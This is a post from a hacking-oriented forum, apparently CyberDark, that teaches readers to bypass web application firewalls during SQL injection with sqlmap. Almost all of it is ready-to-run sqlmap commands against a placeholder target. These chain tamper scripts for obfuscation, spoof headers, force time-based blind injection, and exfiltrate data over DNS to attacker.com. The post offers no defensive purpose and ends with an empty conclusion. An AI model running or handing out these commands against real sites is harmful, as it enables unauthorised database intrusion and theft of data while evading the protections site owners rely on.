What's new

Welcome to CyberDark

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?
Owner

Owner 

Owner
Moderator
Active User
Joined
Aug 23, 2023
Messages
242
Solutions
3
Reaction score
1,127
Points
3,131
Location
Senegal
Website
cyberdark.org

Introduction:


Web Application Firewalls (WAF) are often used to block SQL injection attacks, but they are not foolproof. SQLmap, a popular SQL injection tool, offers several ways to bypass WAF protections by using various options and tamper scripts. This post will dive into practical SQLmap commands and techniques to bypass WAF filters effectively.


1. Basic SQLmap Command for WAF Bypass:


When starting with SQLmap, the first step is testing a target URL to identify vulnerabilities. You can use tamper scripts to modify payloads and avoid detection by WAFs.​


Example:

Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=randomcase,between

  • --tamper=randomcase: Randomizes the case of the payload to evade simple WAFs.
  • --tamper=between: Inserts BETWEEN conditions to break typical patterns WAFs look for.

2. Using SQLmap with Random User Agents and Encoding:


WAFs often detect attacks based on user-agent strings or specific patterns. Using random user agents and encoding can bypass some basic defenses.​


Example:




Bash:
sqlmap -u "http://target.com/page?id=1" --random-agent --tamper=base64encode


  • --random-agent: Sends requests with random user-agent strings to avoid pattern recognition.
  • --tamper=base64encode: Encodes the payload in Base64 to obfuscate the attack.

3. Exploiting Time-Based Blind SQL Injection to Evade WAF:


Time-based SQL injections rely on delayed responses to confirm vulnerability without using explicit error messages, making them harder to detect by WAFs.​



Bash:
sqlmap -u "http://target.com/page?id=1" --technique=T --tamper=space2comment


  • --technique=T: Forces the use of time-based techniques for injection.
  • --tamper=space2comment: Converts spaces to comments (/**/) to bypass WAF filters.

4. Using DNS Exfiltration for Stealthy Data Extraction:


Sometimes WAFs block direct data extraction methods. SQLmap supports out-of-band (OOB) techniques like DNS exfiltration, where data is sent through DNS queries.​


Example:




Bash:
sqlmap -u "http://target.com/page?id=1" --dns-domain=attacker.com --tamper=charencode


  • --dns-domain=attacker.com: Uses DNS to extract data, bypassing WAF by sending information to the specified domain.
  • --tamper=charencode: Encodes the payload as char codes to avoid detection by WAF rules.

5. Combining Multiple Tamper Scripts for Complex WAFs:


To bypass more sophisticated WAFs, you may need to use multiple tamper scripts in combination. SQLmap allows you to chain tamper scripts to break down even the most robust defenses.​


Example:



Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,randomcase,between


  • --tamper=space2comment: Replaces spaces with comments.
  • --tamper=randomcase: Randomizes the case of SQL keywords to avoid pattern matching.
  • --tamper=between: Inserts BETWEEN operators to break up logical queries.

6. Obfuscating SQL Queries with Hex Encoding:


SQLmap can obfuscate queries by converting them to hexadecimal format. This method can confuse WAFs that are not equipped to handle such encodings.​


Example:




Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=hexencode


  • --tamper=hexencode: Converts the payload into hexadecimal format, which bypasses simple pattern-based WAFs.

7. Changing HTTP Methods to Evade Detection:


Sometimes, changing the HTTP method (GET to POST or vice versa) can help evade WAF detection by altering how the payload is sent.​


Example:




Bash:
sqlmap -u "http://target.com/page?id=1" --method=POST --tamper=space2hash


  • --method=POST: Changes the request method to POST to avoid GET-based filters.
  • --tamper=space2hash: Replaces spaces with the # symbol to bypass WAF filtering.

Bash:
8. Testing with Custom HTTP Headers:


WAFs often inspect standard HTTP headers, so sending custom headers or cookies can help avoid detection.​


Example:




Bash:
sqlmap -u "http://target.com/page?id=1" --headers="X-Forwarded-For: 127.0.0.1" --tamper=appendnullbyte


  • --headers: Adds a custom header to the HTTP request.
  • --tamper=appendnullbyte: Adds a null byte (%00) to the end of the payload to bypass filters that expect a specific string structure.

9. Evasion with String Concatenation:


SQLmap allows the use of string concatenation to break up common SQL keywords that WAFs look for.​


Example:



Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=equaltolike


  • --tamper=equaltolike: Replaces = with LIKE to obfuscate the payload and evade WAF detection.

Conclusion:


 
Top